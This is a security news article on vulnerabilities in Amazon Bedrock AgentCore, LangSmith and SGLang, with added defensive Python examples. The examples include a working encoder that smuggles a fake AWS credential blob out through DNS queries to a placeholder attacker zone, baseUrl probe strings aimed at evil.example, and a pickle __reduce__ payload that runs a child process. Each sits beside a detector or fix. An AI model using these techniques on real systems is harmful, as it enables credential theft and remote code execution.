Critical AI Vulnerabilities in Amazon Bedrock, LangSmith and SGLang Enable Data Exfiltration and RCE

Cybersecurity firms warn that multiple AI tooling flaws could let attackers steal data and run code remotely. BeyondTrust researchers found that Amazon Bedrock AgentCore Code Interpreter’s sandbox mode permits outbound DNS queries, a behavior that can be abused to create command-and-control channels and exfiltrate sensitive information via DNS, the company said.

BeyondTrust assigned the issue a CVSS score of 7.5 and described how a malicious actor can use DNS queries and responses to build a bidirectional communication channel, obtain an interactive reverse shell, and pull data from AWS resources if the interpreter’s IAM role has broad permissions. Kinnaird McQuade, chief security architect at BeyondTrust, said attackers could bypass expected network isolation controls by abusing DNS resolution.

Amazon told customers that the DNS behavior is intended functionality and urged affected users to run AgentCore Code Interpreter instances in VPC mode rather than Sandbox mode for complete network isolation and to use DNS firewalls to filter outbound lookups. BeyondTrust said, “This research demonstrates how DNS resolution can undermine the network isolation guarantees of sandboxed code interpreters.”

Jason Soroko, senior fellow at Sectigo, advised administrators to inventory AgentCore instances and migrate critical workloads to VPC mode. “Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls to monitor and block unauthorized DNS resolution,” Soroko said, adding that teams must also audit IAM roles to enforce least privilege.
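To make the DNS-channel claim concrete, the following added example (written for this page, not BeyondTrust's research or any Amazon code) shows both halves of the problem described above: how a code interpreter that can only resolve names still carries bytes out in the labels of the names it asks for, and the kind of check a Route 53 Resolver query-log consumer can run to catch it. The zone `x.example.net`, the client address, the benign hostnames and the credential JSON are all constructed for the demo; the records mimic only the `query_name`/`srcaddr` fields of Resolver query logs.

```python
import base64
import json
import math
from collections import Counter, defaultdict

# Hypothetical attacker-controlled zone (an assumption for this demo): any
# domain the attacker serves authoritative DNS for would see these queries.
EXFIL_ZONE = "x.example.net"
MAX_LABEL = 63    # RFC 1035: one label is at most 63 octets
MAX_NAME = 253    # practical limit for a full name in text form


def encode_exfil_queries(secret: bytes, zone: str = EXFIL_ZONE) -> list:
    """Pack bytes into names of the form s<seq>.<label>.<label>.<label>.<zone>.

    Base32 is used because DNS is case-insensitive and resolvers may fold
    case; padding is dropped here and restored by the decoder. Each name is
    filled with as many 63-octet labels as fit under the 253-octet limit.
    """
    text = base64.b32encode(secret).decode("ascii").rstrip("=").lower()
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    names, seq = [], 0
    while labels:
        parts = [f"s{seq}"]
        while labels and len(".".join(parts + [labels[0], zone])) <= MAX_NAME:
            parts.append(labels.pop(0))
        if len(parts) == 1:
            raise ValueError("zone too long to carry a single data label")
        names.append(".".join(parts + [zone]))
        seq += 1
    return names


def decode_exfil_queries(names: list, zone: str = EXFIL_ZONE) -> bytes:
    """Reassemble the payload from the names an authoritative server logged."""
    chunks = {}
    for name in names:
        labels = name[: -(len(zone) + 1)].split(".")
        chunks[int(labels[0][1:])] = "".join(labels[1:])
    text = "".join(chunks[k] for k in sorted(chunks)).upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def detect_dns_exfil(records, min_unique=5, min_sub_len=40):
    """Flag (client, zone) pairs whose lookups look like a data channel: many
    distinct names under one zone, each with a long subdomain part. Entropy is
    reported as supporting evidence rather than used as the trigger, because
    short service names such as 'bedrock-runtime' already score high."""
    by_zone = defaultdict(list)
    for rec in records:
        labels = rec["query_name"].rstrip(".").lower().split(".")
        zone = ".".join(labels[-2:])      # crude registrable-domain guess
        by_zone[(rec["srcaddr"], zone)].append(".".join(labels[:-2]))
    findings = []
    for (src, zone), subs in by_zone.items():
        unique = set(subs)
        mean_len = sum(len(s) for s in unique) / len(unique)
        if len(unique) >= min_unique and mean_len >= min_sub_len:
            findings.append({
                "srcaddr": src, "zone": zone, "unique_names": len(unique),
                "mean_subdomain_len": round(mean_len, 1),
                "mean_entropy": round(
                    sum(shannon_entropy(s) for s in unique) / len(unique), 2),
            })
    return findings


# Constructed sample data: a fake credential blob (AWS's documented example
# key id) and benign lookups a Bedrock workload would plausibly make.
SAMPLE_SECRET = json.dumps({
    "AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
    "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "SessionToken": "FwoGZXIvYXdzEXAMPLE" * 30,
}).encode()

BENIGN_NAMES = [
    "sts.us-east-1.amazonaws.com", "bedrock-runtime.us-east-1.amazonaws.com",
    "s3.us-east-1.amazonaws.com", "logs.us-east-1.amazonaws.com",
    "kms.us-east-1.amazonaws.com", "dynamodb.us-east-1.amazonaws.com",
    "pypi.org", "files.pythonhosted.org",
]


def build_sample_log(src="10.0.1.23"):
    """Records shaped like Resolver query logs (only the fields read above)."""
    names = BENIGN_NAMES + encode_exfil_queries(SAMPLE_SECRET)
    return [{"query_name": n + ".", "query_type": "A", "rcode": "NOERROR",
             "srcaddr": src} for n in names]


if __name__ == "__main__":
    queries = encode_exfil_queries(SAMPLE_SECRET)
    print(len(queries), "queries carry", len(SAMPLE_SECRET), "bytes")
    print(detect_dns_exfil(build_sample_log()))
```

The point of the encoder is that no TCP egress is needed: the interpreter only calls the resolver, and the resolver's upstream lookups carry the data to the attacker's nameserver. A DNS Firewall rule group that denies everything except an explicit allowlist of zones closes that path; the detector above is what you run over query logs while that allowlist is being built, tuned on unique-name count and subdomain length per source.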

Separately, Miggo Security disclosed a high-severity flaw in LangSmith that could enable token theft and account takeover. Miggo reported CVE-2026-25750 with a CVSS score of 8.5, affecting cloud and self-hosted deployments. The issue stemmed from a lack of validation of a baseUrl parameter, which allowed attackers to craft links that steal signed-in users' bearer tokens, user IDs, and workspace IDs.

Miggo researchers Liad Eliyahu and Eliana Vuijsje warned, “A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link.” LangSmith addressed the issue in version 0.12.71 released in December 2025, Miggo said.
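The bug class here is an unvalidated base URL: a client that reads where to send its API calls from something an attacker controls will send its bearer token there too. The following added example is an illustration of that class and its fix, not LangSmith's code or Miggo's proof of concept; the origin `https://api.smith.example`, the request path and the token are assumptions. It shows the vulnerable resolver beside a hardened one and the inputs that a naive string check gets wrong.

```python
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical allowlist of origins the client may attach credentials to.
ALLOWED_API_ORIGINS = {"https://api.smith.example"}
DEFAULT_BASE_URL = "https://api.smith.example"


def resolve_base_url_unsafe(requested: Optional[str]) -> str:
    """The vulnerable pattern: whatever baseUrl the page link carried is used."""
    return requested or DEFAULT_BASE_URL


def resolve_base_url(requested: Optional[str]) -> str:
    """Hardened: accept only an exact, normalised origin from the allowlist."""
    if not requested:
        return DEFAULT_BASE_URL
    parts = urlsplit(requested)
    if parts.scheme != "https":            # blocks http://, //host, javascript:
        raise ValueError("baseUrl must be https")
    if parts.username is not None or parts.password is not None:
        raise ValueError("baseUrl must not carry userinfo")   # https://good@evil
    host = parts.hostname                  # lower-cased, userinfo stripped
    if not host:
        raise ValueError("baseUrl has no host")
    port = parts.port                      # raises ValueError on a junk port
    origin = f"https://{host}" + (f":{port}" if port not in (None, 443) else "")
    if origin not in ALLOWED_API_ORIGINS:  # exact match, so good.evil fails too
        raise ValueError(f"origin {origin!r} is not allowed")
    return origin + parts.path.rstrip("/")


def build_session_request(base_url: str, token: str) -> dict:
    """What the client sends next; with the unsafe resolver the Authorization
    header goes wherever the attacker's link pointed."""
    return {"url": f"{base_url}/api/v1/sessions",
            "headers": {"Authorization": f"Bearer {token}"}}


def evaluate(candidates) -> dict:
    """Map each candidate baseUrl to the accepted value or 'rejected'."""
    out = {}
    for url in candidates:
        try:
            out[url] = resolve_base_url(url)
        except ValueError:
            out[url] = "rejected"
    return out


# Constructed probe inputs: the first three are legitimate spellings of the
# allowed origin, the rest are the usual ways a substring check is fooled.
PROBES = [
    "https://api.smith.example",
    "HTTPS://API.SMITH.EXAMPLE/",
    "https://api.smith.example:443/v2",
    "https://api.smith.example@evil.example",
    "https://api.smith.example.evil.example",
    "https://evil.example/api.smith.example",
    "//evil.example",
    "http://api.smith.example",
    "https://api.smith.example:8443",
    "https://api.smith.example:abc",
    "javascript:alert(1)",
]

if __name__ == "__main__":
    for url, verdict in evaluate(PROBES).items():
        print(f"{verdict:<35} <- {url}")
    print(build_session_request(resolve_base_url_unsafe("https://evil.example"), "tok"))
```

Two design points matter. The check compares a rebuilt origin against an allowlist rather than testing whether the trusted hostname appears in the string, which is what the `good@evil`, `good.evil` and `evil/good` probes defeat. And it rejects rather than repairs: a link with an unexpected baseUrl is an attack indicator, not something to quietly fix up.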

Open-source SGLang also has critical weaknesses tied to unsafe pickle deserialization, Orca Security researcher Igor Stepansky reported. Stepansky disclosed three CVEs. CVE-2026-3059 and CVE-2026-3060, each scored 9.8, allow unauthenticated remote code execution when specific network-exposed modules are enabled, because those modules deserialize untrusted data with pickle.loads(). CVE-2026-3989, scored 7.8, involves insecure pickle.load() use in a crash-replay utility.

“The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network,” Stepansky said.

In a coordinated advisory, the CERT Coordination Center said those SGLang components are exploitable if they are enabled and the attacker can reach the ZeroMQ broker port. CERT/CC recommended restricting network exposure of SGLang interfaces, implementing segmentation and access controls, and monitoring for unexpected inbound TCP connections and unusual child processes or file activity. CERT/CC noted there was no public evidence of exploitation in the wild but urged vigilance.
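Why pickle.loads() on network input is remote code execution, and what the two usual mitigations look like, as an added example written for this page (not SGLang's code, Orca's proof of concept, or the project's actual fix): the payload is the standard `__reduce__` trick, here wired to spawn a harmless child process, which is exactly the kind of activity the CERT/CC advisory says to monitor for. The message schema and the allowlist contents are assumptions.

```python
import io
import json
import pickle
import subprocess

# In the vulnerable pattern these bytes arrive from a network socket (the
# advisory names a ZeroMQ port); here they are constructed locally.


class EvilPayload:
    """Any object can instruct pickle to call an arbitrary callable on load."""

    def __reduce__(self):
        # Stand-in for a real payload: spawns a child process and returns its
        # output. A real attacker would reference os.system or similar.
        return (subprocess.check_output, (["echo", "pickle-rce-demo"],))


def craft_payload() -> bytes:
    return pickle.dumps(EvilPayload())


def unsafe_loads(data: bytes):
    """The vulnerable pattern: untrusted bytes straight into pickle.loads()."""
    return pickle.loads(data)


# Mitigation 1: a restricted unpickler that refuses every global except an
# explicit allowlist. Scalars, lists, dicts and tuples need no globals at all,
# so a message built from those still loads.
SAFE_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to load global {module}.{name}")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Mitigation 2 (preferred for anything that crosses a network boundary): a
# serialization format that cannot express code, plus type checks on output.
def encode_message(msg: dict) -> bytes:
    return json.dumps(msg).encode("utf-8")


def decode_message(data: bytes) -> dict:
    obj = json.loads(data.decode("utf-8"))
    if not isinstance(obj, dict):
        raise ValueError("message must be a JSON object")
    return obj


if __name__ == "__main__":
    payload = craft_payload()
    print("unsafe_loads ran a child process:", unsafe_loads(payload))
    try:
        safe_loads(payload)
    except pickle.UnpicklingError as exc:
        print("safe_loads refused:", exc)
    print(safe_loads(pickle.dumps({"req": [1, 2, 3]})))
```

The restricted unpickler is the drop-in fix when a wire format cannot be changed quickly, but it only holds if the allowlist stays tiny: every class it admits is attack surface again. Moving the network-facing messages to JSON (or another data-only encoding) removes the problem rather than filtering it, which is why it is listed second only in order, not in preference.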

What to do now: follow vendor guidance, apply available patches, migrate critical AI code interpreters from Sandbox to VPC mode where recommended, deploy DNS filtering, and audit IAM roles and network exposure for AI tooling. The incidents show that AI observability and execution platforms become high-value targets when configuration mistakes or unsafe deserialization are present.

#AIsecurity #Vulnerabilities #DNSExfiltration #RCE #devsecops #cybersecurity #news